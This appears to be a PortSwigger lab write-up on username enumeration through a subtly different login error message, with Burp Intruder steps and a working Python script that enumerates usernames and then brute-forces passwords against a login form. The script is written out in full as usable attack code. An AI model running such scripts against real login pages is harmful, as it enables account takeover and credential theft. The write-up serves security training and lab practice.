Authentication
Username enumeration via subtly different responses
Yo, people!😎 It’s been a while. Here is another lab solution based on PortSwigger Labs. This lab is subtly vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists. Our task is to find the valid credentials and log in. Let’s go, guys!
Candidate usernames
Candidate passwords
Authentication
An authentication vulnerability is a weakness in a system that lets an attacker bypass or break the process used to verify users' identities. In this lab the weakness is a subtle difference in the login error message for valid and invalid usernames, which lets us enumerate a username and then brute-force its password.
End Goals:
- Log in with the valid credentials.
Steps To Reproduce:
- Check all the features and functionality of the application. Make sure your proxy is on so you can capture and analyze the traffic, then go to the login page.
- Enter any username and password you want, then send the login request to the Intruder tab and set the username parameter as the payload position.
- In the Payloads tab, make sure the Simple list payload type is selected and paste in the list of candidate usernames. Then, in the Settings side panel, under Grep - Extract, click Add. In the response that appears, scroll down until you see the error message:
Invalid username or password.
Use the mouse to highlight the text of the message, then click OK and start the attack.
- In the results, sort by the extracted column. One response has no trailing period in the error message ("Invalid username or password" instead of "Invalid username or password."). That subtle difference means the username exists, so note it down. If the messages had been identical, the other signals to check would be the response length and the response time.
- Now that we have a valid username, fix it in the request and enumerate passwords to get the full credentials.
- Set the password parameter as the payload position, paste the list of candidate passwords into the payload configuration, and start the attack.
- Only one response has a different status code: 302 (a redirect after a successful login) instead of 200. That payload is the valid password.
- Log in with those credentials and the lab is solved.
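The same two-stage attack, written as a script instead of Intruder, as an added example that is not part of the original write-up or of PortSwigger's lab materials. The sender function and the `LAB_URL` value are my own assumptions (replace the host with your lab instance); the offline `fake_send` server, its `amateur`/`hunter2` account and the tiny wordlists are constructed purely so the logic can be run and checked without a lab. Stage one groups candidate usernames by the exact error message extracted from the response and returns the single outlier; stage two replays passwords against that username and stops at the first 302.

```python
"""Username enumeration via subtly different responses, then password brute force.

Added example; not the lab's own code. LAB_URL is a placeholder assumption.
"""
import re
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Iterable, Optional, Tuple

LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/login"  # assumption: set to your instance

# The lab's error text, with the trailing period optional so both variants are captured.
ERROR_RE = re.compile(r"Invalid username or password\.?")

Sender = Callable[[str, str], Tuple[int, str]]  # (username, password) -> (status, body)


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 302s: the redirect itself is the success signal we want to see."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # makes urllib raise HTTPError carrying the 302


def send_login(username: str, password: str, url: str = LAB_URL) -> Tuple[int, str]:
    """POST the login form and return (status code, response body) without following redirects."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx land here because of NoRedirect
        return err.code, err.read().decode(errors="replace")


def extract_error(body: str) -> Optional[str]:
    """Equivalent of Burp's Grep - Extract: pull the error message out of the HTML."""
    match = ERROR_RE.search(body)
    return match.group(0) if match else None


def enumerate_username(send: Sender, usernames: Iterable[str]) -> Optional[str]:
    """Return the one username whose extracted error message differs from all the others."""
    messages = {u: extract_error(send(u, "definitely-wrong-password")[1]) for u in usernames}
    counts = Counter(messages.values())
    if len(counts) < 2:
        return None  # every response looked the same: no enumeration signal
    common = counts.most_common(1)[0][0]
    outliers = [u for u, m in messages.items() if m != common]
    return outliers[0] if len(outliers) == 1 else None


def brute_force_password(send: Sender, username: str, passwords: Iterable[str]) -> Optional[str]:
    """Replay candidate passwords; a 302 (redirect after login) marks the valid one."""
    for password in passwords:
        status, _ = send(username, password)
        if status == 302:
            return password
    return None


def attack(send: Sender, usernames: Iterable[str], passwords: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Run both stages and return (username, password) on success."""
    username = enumerate_username(send, usernames)
    if username is None:
        return None
    password = brute_force_password(send, username, passwords)
    return (username, password) if password else None


# --- constructed offline stand-in for the lab (not real lab data) -------------------------
DEMO_USER, DEMO_PASS = "amateur", "hunter2"  # constructed demo account


def fake_send(username: str, password: str) -> Tuple[int, str]:
    """Mimics the lab: unknown user -> message with a period, known user -> no period, success -> 302."""
    if username != DEMO_USER:
        return 200, '<p class="is-warning">Invalid username or password.</p>'
    if password != DEMO_PASS:
        return 200, '<p class="is-warning">Invalid username or password</p>'
    return 302, ""


if __name__ == "__main__":
    users = ["admin", "alice", "amateur", "bob", "carol"]  # constructed wordlists
    passwords = ["123456", "password", "hunter2", "letmein"]
    print(attack(fake_send, users, passwords))  # swap fake_send for send_login against a real lab
```

Against a real instance you would load the two PortSwigger wordlists into `users` and `passwords` and pass `send_login` instead of `fake_send`; the script keeps the redirect unfollowed on purpose, because following it would turn the 302 into a 200 and hide the only difference that stage two relies on.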
That’s all, friends. Thank you for reading up to this point. I would like to hear your feedback on anything not clear here. Here is my Twitter account @T3chnocr4t. Feel free to DM me if you have any issues with my write-up. Thanks!